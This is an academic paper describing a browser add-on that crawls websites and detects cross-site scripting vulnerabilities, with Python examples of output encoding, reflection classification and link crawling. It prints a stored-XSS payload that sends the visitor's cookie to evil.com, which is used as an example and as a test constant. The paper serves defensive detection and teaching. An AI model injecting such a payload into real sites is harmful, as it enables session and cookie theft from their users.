Detecting XSS Based Web Application Vulnerabilities


M.S. Jasmine, M.Tech (ISCF) Student, Department of Information Technology, SRM University, Tamil Nadu, India, jasmine.srakj@gmail.com
Kirthiga Devi, Assistant Professor, Department of Information Technology, SRM University, Tamil Nadu, India, kirthigadevi.t@ktr.srmuniv.ac.in
Geogen George, Assistant Professor, Department of Information Technology, SRM University, Tamil Nadu, India, geogen.g@ktr.srmuniv.ac.in

Abstract - Web applications are developed using technologies such as HTML, JavaScript, XML and AJAX, and are accessed by millions of users for a wide range of services. Design-level vulnerabilities in these technologies lead to security breaches, including the theft of users' credentials. One of the hacking techniques used to attack web applications is Cross-site scripting (XSS). XSS is a computer security vulnerability found in web applications; XSS vulnerabilities allow denial of service and the stealing of cookies, session tokens and other sensitive user data. A Cross-site scripting (XSS) attack targets a web application by embedding scripts in a web page that are executed at the client side or server side, so that the attacker can manipulate information as desired. This paper discusses Cross-site scripting (XSS) vulnerabilities in the current browser session of web applications. Websites may contain malicious script code that can be detected with a detection tool at the client side. In the proposed model, the XSS-Check add-on detects Persistent XSS based on a single request/response cycle. It determines whether the user input for a web page is returned with the result, checks web pages with logon functionality and information encoded in the HTTP headers, and includes the DOM parameter. Once identified, validation is performed across dynamic web pages on both the server and client side.
Keywords: Cross-site scripting (XSS), Web Application Vulnerabilities, Persistent XSS, XSS-Check add-on

I. INTRODUCTION
A Cross-site Scripting (XSS) attack occurs when an attacker sends malicious code, in the form of a browser-side script, to the end users of a web application. Web applications are designed and coded as dynamic web pages that provide online services for organizations. A Cross-site Scripting (XSS) attack involves three parties: the attacker, a client and the website. Its aim is to obtain user information associated with the website, namely the username and password and other data. Cross-site scripting attacks use known vulnerabilities in web-based applications, their servers, or the plug-in systems on which they rely. A hacker who is able to inject malicious code into a dynamic website has that code executed in the web browser, where it changes the web pages. The goal of an XSS attack is to steal the client's cookies or any other sensitive information used to authenticate the client to the website. A web application vulnerability is harmful to the application owner, the application users and other entities. A website can be protected from XSS vulnerabilities by some service providers. Special characters (such as <, >, /, etc.) are identified and encoded in the output, and they need to be filtered as input in web applications. A website may be vulnerable or secure, and users are unable to identify XSS attacks on their own. Before accessing a website, a user can scan it with the detection tool, which identifies whether the web application is secure or insecure. Various XSS payloads are used to scan for and detect website vulnerabilities live. The payloads are included in the code, which makes it easy to detect some vulnerable websites. A vulnerable website contains web page forms that can carry malicious JavaScript code. Using the JavaScript alert call, the detection tool detects XSS vulnerabilities in websites. A web page loaded in the browser carries client-side JavaScript code.
Cross-site Scripting is a JavaScript-based attack because it delivers JavaScript code from a malicious web server that is executed in the user's browser. The problems caused by XSS vulnerabilities include the theft of the user's cookies, web page modification, etc. In a stored or persistent XSS attack, the malicious JavaScript or other code is permanently stored on the vulnerable database server. In a stored XSS attack, when a victim requests the stored information from the vulnerable server, the server injects the malicious script into the victim's browser. The browser then executes the code or script because the vulnerable server is usually a known or trusted site. For instance, an attacker can post a message containing the malicious script to a message board, which stores it and subsequently displays it to other users, causing the attack.
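As an added illustration (not code from the paper or from the XSS-Check add-on), the following Python snippet shows the output-encoding step the introduction refers to: the special characters are encoded when stored text is written back into a page, so a message-board comment carrying a script tag, in the style of the paper's persistent vector, is displayed literally instead of being run. The message-board renderer, the character table (the paper's <, >, / plus &, " and ' so the encoding also holds inside quoted attributes) and the sample comment are assumptions constructed for this example.

```python
import html

# Assumed encoding table: the characters the paper names (<, >, /) plus &, "
# and ', so the result is also inert inside a quoted attribute value.
_ENCODE = {
    "&": "&amp;",
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
    "'": "&#x27;",
    "/": "&#x2F;",
}


def encode_for_html(text: str) -> str:
    """Encode text so the browser shows it literally instead of parsing it as markup."""
    return "".join(_ENCODE.get(ch, ch) for ch in text)


# Constructed stored comment in the style of the paper's persistent XSS vector
# (evil.example is a placeholder host).
STORED_COMMENT = (
    '<SCRIPT>document.images[0].src="http://evil.example/images.jpg?stolencookie="'
    "+document.cookie;</SCRIPT>"
)


def render_comment_vulnerable(comment: str) -> str:
    """'Before' case: the stored text is concatenated into the page unchanged,
    so a stored script tag reaches every visitor's browser intact."""
    return "<div class='comment'>" + comment + "</div>"


def render_comment_safe(comment: str) -> str:
    """Hardened case: the stored text is encoded at output time."""
    return "<div class='comment'>" + encode_for_html(comment) + "</div>"


def contains_raw_markup(rendered_fragment: str) -> bool:
    """Unit-test style check on the renderer: does the part of the page that was
    built from user data still contain any unencoded markup characters?"""
    inner = rendered_fragment[len("<div class='comment'>"):-len("</div>")]
    return any(ch in inner for ch in "<>\"'/")


def roundtrip(text: str) -> bool:
    """The encoding is lossless: the browser decodes it back to the same text,
    so users still see exactly what was posted, just not as markup."""
    return html.unescape(encode_for_html(text)) == text


if __name__ == "__main__":
    print("vulnerable:", render_comment_vulnerable(STORED_COMMENT))
    print("safe:      ", render_comment_safe(STORED_COMMENT))
```

The vulnerable renderer emits the comment with its script element intact, while the hardened renderer emits only entity references, which the browser displays as text; the roundtrip check shows that nothing the user wrote is lost in the process.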

II. PROBLEM STATEMENT
To scan for and detect web application vulnerabilities and protect websites from web-based attacks, the XSS-Check add-on is developed.

III. Objectives of XSS-Check add-on
The objective of this paper is to study the detection of XSS vulnerabilities in web applications and the solutions that prevent such attacks. The XSS-Check add-on is developed to detect Cross-site scripting (XSS) vulnerabilities and protect websites from web-based attacks. XSS-Check detects both types of XSS, Non-persistent and Persistent, based on a single request/response cycle. It determines whether the user input for a web page is returned with the result, checks web pages with logon functionality and information encoded in the HTTP headers, and includes the DOM parameter. Once identified, validation is performed across dynamic web pages on both the server and client side. The XSS-Check add-on user interface is used to scan for, detect and provide solutions to such XSS attacks in the current browser session. It counts the number of attacks in the website. The XSS-Check add-on opens as a user interface in the browser to check the given websites. It can be used as a security detection tool that detects malicious JavaScript code in the retrieved web pages. It uses various payloads as input to the web page forms of the website. The user input is a URL, from which all the links in the given website are found. It crawls all the web pages available in the website, and all the links are stored in a report. It extracts every link present in the website and scans the form fields of the web pages. When Live Detect is clicked in the user interface, it retrieves all the links associated with the given website. The next page of the user interface shows the number of XSS detections in the website. The solution link provides the prevention for the detected XSS payloads.

IV. Cross-site Scripting
There are two types of XSS: Persistent XSS and Non-Persistent XSS.

Persistent XSS
A Persistent XSS attack is also known as a stored XSS or Type-I XSS attack. It involves injecting malicious script into a website, where the script is stored in the vulnerable database. Persistent XSS can be difficult to detect and is considered more harmful than the other two attack types. Because the malicious script is rendered automatically, there is no need to target individual victims or lure them to a third-party website. An attacker can easily hide their activity; for example, on a blog they could embed the script in a seemingly innocuous comment. The sensitive data of every visitor to the website is put at risk. In a stored XSS attack, when a victim requests the stored information from the vulnerable server, the server injects the malicious script into the victim's browser. The browser then executes the code or script because the vulnerable server is usually a known or trusted site. For instance, an attacker can post a message containing the malicious script to a message board, which stores it and subsequently displays it to other users, causing the attack. Stored XSS payloads are kept in a vulnerable database and may also reside in a resource such as the file system. The victim receives the online message board content together with the JavaScript code embedded in the website.

Persistent XSS vector:
<SCRIPT>document.images[0].src="http://evil.com/images.jpg?stolencookie="+document.cookie;</SCRIPT>

The Persistent XSS vector starts with <script> and ends with </script>. The cookie theft is performed through the request for the file images.jpg on evil.com: the victim's cookie is appended to the image URL and so delivered to the attacker's server.

Non-Persistent XSS
Reflected XSS is a type of XSS in which a page containing malicious code is reflected back by the browser, for example as a search result. The attack targets a website vulnerability in the dynamic part of the web application. An attacker uses social engineering to make a user visit a manipulated URL with embedded malicious code. The modified code in the URL is executed by the web browser when the user clicks on the malicious link.

V. IMPLEMENTATION
Flow Diagram
Solutions for preventing such attacks will be provided. The label Search any website is used to enter any website whose links are to be scanned. After a website is given as input, for instance http://www.google.com, the add-on checks all the links and sub-links of the given website. Before searching, a variable checks whether a URL has been passed as input or not. A report is generated that contains the links extracted from the given website. The solution link gives the prevention for the respective XSS attacks.

Figure: XSS-Check User Interface
Figure: Flow Diagram of XSS-Check add-on User Interface

This diagram shows the user input given as a URL. Live Detect is used to scan for and detect web application vulnerabilities in the current browser session. The label named Number of links displays the number of XSS vulnerabilities present in the current browser session for the given website. The XSS-Check user interface is used to search and scan any given website, check for specific XSS and, by clicking the Live Detect button, run the links of the website through the check for web application vulnerabilities in the current browser session.
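The core of the single request/response check described in Sections III and IV is deciding, from the response alone, whether submitted input came back and in which context it landed. The Python snippet below is an added example (not the add-on's code) of that decision: a unique canary is placed in the test payload, the returned HTML is parsed, and the canary is classified as executable (inside a script body, an event-handler attribute or a javascript: URL), reflected but inert (encoded text or an ordinary attribute value) or absent. The canary value, the sample responses and the context names are constructed for this example.

```python
from html.parser import HTMLParser

# Constructed canary: a unique token placed in the test input so that any
# occurrence in the response can be attributed to what was submitted.
CANARY = "xsschk7f3a"
PAYLOAD = "<script>alert('" + CANARY + "')</script>"

# Constructed responses standing in for what a scanner would receive back.
RESPONSE_UNESCAPED = "<html><body><h1>Results for " + PAYLOAD + "</h1></body></html>"
RESPONSE_ENCODED = (
    "<html><body><h1>Results for &lt;script&gt;alert(&#x27;" + CANARY
    + "&#x27;)&lt;/script&gt;</h1></body></html>"
)
RESPONSE_ATTRIBUTE = (
    '<html><body><form><input name="q" value="' + CANARY + '"></form></body></html>'
)
RESPONSE_ABSENT = "<html><body><h1>No results</h1></body></html>"

EXECUTABLE_CONTEXTS = {"script-body", "event-handler", "javascript-url"}


class CanaryContextFinder(HTMLParser):
    """Walks the response and records every context in which the canary lands."""

    def __init__(self, canary):
        super().__init__()
        self.canary = canary
        self.in_script = False
        self.findings = []  # list of (context, detail)

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True
        for name, value in attrs:
            if not value or self.canary not in value:
                continue
            if name.lower().startswith("on"):
                self.findings.append(("event-handler", name))
            elif value.strip().lower().startswith("javascript:"):
                self.findings.append(("javascript-url", name))
            else:
                self.findings.append(("attribute", name))

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        # Entity-encoded markup is delivered here as decoded text, so an encoded
        # payload is classified as text rather than as a script body.
        if self.canary in data:
            self.findings.append(("script-body" if self.in_script else "text", None))


def classify_response(response_html, canary=CANARY):
    """Verdict for one request/response cycle: (verdict, findings)."""
    finder = CanaryContextFinder(canary)
    finder.feed(response_html)
    finder.close()
    if any(ctx in EXECUTABLE_CONTEXTS for ctx, _ in finder.findings):
        return "vulnerable", finder.findings
    if finder.findings:
        return "reflected-inert", finder.findings
    return "not-reflected", finder.findings


if __name__ == "__main__":
    for name, body in [("unescaped", RESPONSE_UNESCAPED), ("encoded", RESPONSE_ENCODED),
                       ("attribute", RESPONSE_ATTRIBUTE), ("absent", RESPONSE_ABSENT)]:
        print(name, "->", classify_response(body))
```

Classifying by parsed context rather than by substring search is what keeps the check honest: the encoded response still contains the literal characters of the payload, but the parser sees them as text, so only the unescaped response is reported as vulnerable.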

The links related to XSS attacks present in the website are counted, the links are displayed and solutions for preventing such attacks are provided. The report is generated as the extraction of links for the given website. The label named Number of Counts displays the number of XSS vulnerabilities present in the current browser session for the given website. The solution link provides prevention of the respective XSS vulnerabilities. If the URL has been given correctly, the tool checks the URLs of the links live. Short traversal is used to find all the links directly associated with the given URL, and comprehensive traversal is used to find all the sub-links of each link. The tool scans the given website and searches for all the links associated with the URL. The Live Detect function is clicked to find XSS in the website. It starts looking for XSS inside the URL, which starts with http://www. Inside the website, it opens each link and finds the forms into which a payload can be placed. A page that accepts the payload can be read and scanned for the URLs related to the vulnerability; otherwise the page cannot be read from the URL. The second payload is an alert on the page visited by users; if there is no alert, the requested page cannot be opened and read. If, for all the payloads, the instance is unable to read the page from the URL, it returns No link found and exits the page. The URL starting with http://www. is the input given to search for and find cross-site scripting; all the links and sub-links of the given website are searched.
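The short and comprehensive traversals described above, together with the link report and the No link found outcome, are shown in the following added Python example; it is not the add-on's code. Network fetches are replaced by a constructed in-memory site (all hosts, paths and page bodies are made up), the traversal is restricted to the start URL's host, and the form actions collected during the walk are the points a scanner would later exercise. The input check accepts any http or https URL with a host, which is a generalisation of the paper's http://www. convention.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Constructed in-memory site standing in for the live HTTP fetches the add-on
# makes; every URL and page body below is invented for this example.
SITE = {
    "http://www.example.test/": (
        '<a href="/about">About</a> <a href="/search">Search</a> '
        '<a href="http://www.other.test/">Partner</a>'
    ),
    "http://www.example.test/about": '<a href="/">Home</a> <a href="/team">Team</a>',
    "http://www.example.test/search": (
        '<form action="/search" method="get"><input name="q"></form> '
        '<a href="/about">About</a>'
    ),
    "http://www.example.test/team": '<a href="/about">Back</a>',
}


def fetch(url):
    """Stand-in for an HTTP GET; returns None when the page cannot be read."""
    return SITE.get(url)


class LinkAndFormExtractor(HTMLParser):
    """Collects absolute link targets and form actions from one page."""

    def __init__(self, base_url):
        super().__init__()
        self.base_url = base_url
        self.links = []
        self.forms = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "a" and a.get("href"):
            self.links.append(urljoin(self.base_url, a["href"]))
        elif tag == "form":
            # A form without an action submits back to the page itself.
            self.forms.append(urljoin(self.base_url, a.get("action") or ""))


def extract(url):
    page = fetch(url)
    if page is None:
        return [], []
    ex = LinkAndFormExtractor(url)
    ex.feed(page)
    ex.close()
    return ex.links, ex.forms


def same_site(url, start):
    return urlparse(url).netloc == urlparse(start).netloc


def short_traversal(start):
    """Links that appear directly on the start page, restricted to its host."""
    links, _ = extract(start)
    return sorted({link for link in links if same_site(link, start)})


def comprehensive_traversal(start, max_pages=200):
    """Breadth-first walk over every same-host sub-link. Returns the pages in
    visiting order and the form targets found, which are the scan points."""
    visited, queue, seen, forms = [], [start], {start}, set()
    while queue and len(visited) < max_pages:
        url = queue.pop(0)
        visited.append(url)
        links, page_forms = extract(url)
        forms.update(page_forms)
        for link in links:
            if same_site(link, start) and link not in seen:
                seen.add(link)
                queue.append(link)
    return visited, sorted(forms)


def build_report(start):
    """The report the interface shows: extracted links, form targets, and the
    paper's 'No link found' outcome when the start URL yields nothing."""
    parts = urlparse(start)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        return {"status": "invalid URL", "pages": [], "forms": []}
    pages, forms = comprehensive_traversal(start)
    direct = short_traversal(start)
    if not direct:
        return {"status": "No link found", "pages": pages, "forms": forms}
    return {"status": "ok", "pages": pages, "forms": forms, "direct_links": direct}


if __name__ == "__main__":
    print(build_report("http://www.example.test/"))
    print(build_report("http://www.example.test/missing"))
```

The same-host filter matters for a live scanner: without it, a comprehensive traversal follows partner and advertising links off the site the user asked about, which both inflates the report and sends test input to servers the user never named.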

VI. CONCLUSIONS
The XSS-Check user interface is used to search and scan websites, finding all their links and detecting web application vulnerabilities. It extracts all the links and sub-links present in the website into a report. It counts the number of XSS links present in the website, and it provides prevention for such attacks through the solution link.